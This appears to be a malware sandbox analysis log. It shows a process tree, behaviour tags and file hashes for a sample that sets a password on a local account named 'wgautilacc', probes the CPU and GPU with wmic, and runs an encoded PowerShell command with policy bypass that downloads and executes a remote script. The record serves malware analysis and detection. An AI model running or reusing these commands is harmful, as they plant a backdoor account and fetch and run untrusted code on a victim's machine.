C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc EdrwL8Uu1⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\net.exenet.exe user wgautilacc EdrwL8Uu2⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc EdrwL8Uu3⤵PID:1384
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3924
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2356
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3604
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1792
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1256
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:4512
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:4552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:4572
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
3fc8b4f6b1f242af7cdb0fc51a6d692f
SHA11ca8ae7b7d06722ae8eebf7433957c6101544886
SHA2562c8e5ee3fde5d5835d807940007990aa3a31e9ceb8cee59047f5ab9df53cfd74
SHA512d2f7c0df3ceadf708849528bf23183b50fa052595b2b8d952a64be0733a8fe2c12efe73b07fae7b85f63122ec8f7c5987462e4abb6465387124dbe09a9df1d40
-
MD5
1ef6eef1d39c71661339d818226d688d
SHA1b3e44163a9d9894d091f59f888d7d5d90e68e216
SHA256dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a
SHA5128deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49
-
MD5
ea221853831e01a9189509e963b88ba0
SHA12dfc848f7b0ec9760412ed40e5133cb59bc011d5
SHA256c5f3667f652f85bfdeae8b628f27763d84886eef99eb97d38021757e4a092905
SHA512a2ec0b074d5d1a999a5e15288eaed06137dde09031dbcb6fd1ff37dece842ca9c3087384133b8c4d5606cb702496402a339269b2e1332bedcee36a8400503f3b
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
83a173563050acb2c4bf93708c9f1ff5
SHA1136c858ad17649457de043d6c4204d0aa76fd5e0
SHA25681f4c36cc17d054f5d0ba299f968637bb2222f0b8d66fd28693f8355c158f2a1
SHA512c8a30c871397a35d6e95d6154cea0293b1ec083d8b5b46c483fcc1c52695da11b5190a33d060cd4be67532aeaae8f4416f644ba330cc40c563ea74089c2dfc3d
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
4440fbe9cce70baec4cf0991d692293d
SHA10a67ac11fdbe4deb2902a1f11b12415df6b5fd77
SHA256214abb69603154debc34b36abef5011e3a51d6ed2f03d3830a0a410ba8a7d745
SHA5126e36f1ff6b25cc1cd9bdf01abd64e32cc02968c73b23d1316d3b0f70127155527295a8e7e4cdc34496637d078ea13256738967528a6dbdb03c70afc4daa707bb
-
MD5
44161e115bf968d5b616d254be2f38a1
SHA1b801a9318b1fc89996f76055c69e071e0fed368a
SHA2562750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491
SHA512375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e
-
MD5
7245ed7533b89d29f7f5bb35830d4560
SHA18efaef0babf855989e460451803032940ae0c7bd
SHA25689549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638
SHA512f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3